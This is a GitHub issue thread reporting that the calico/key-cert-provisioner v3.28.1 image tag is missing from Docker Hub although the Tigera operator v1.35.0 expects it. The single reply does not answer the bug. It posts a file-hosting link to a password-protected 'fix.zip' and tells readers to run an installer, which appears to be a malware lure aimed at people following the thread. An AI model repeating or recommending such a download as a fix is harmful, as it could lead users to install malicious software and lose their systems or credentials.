### ISSUE TITLE
Bug calico/key-cert-provisioner not tagged for v3.28.1

### ISSUE THREAD

**Issue by NaomiLYJ** [projectcalico/calico#9177]
Similar issue to https://github.com/projectcalico/calico/issues/8850, the calico/key-cert-provisioner v3.28.1 does not exist in dockerhub yet

## Expected Behavior

For quay.io/tigera/operator:v1.35.0, the calico/key-cert-provisioner v3.28.1 is used. But 
docker pull calico/key-cert-provisioner:v3.28.1 shows not found

## Your Environment

* Calico version
* Orchestrator version (e.g. kubernetes, mesos, rkt):
* Operating System and version:
* Link to your project (optional):

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
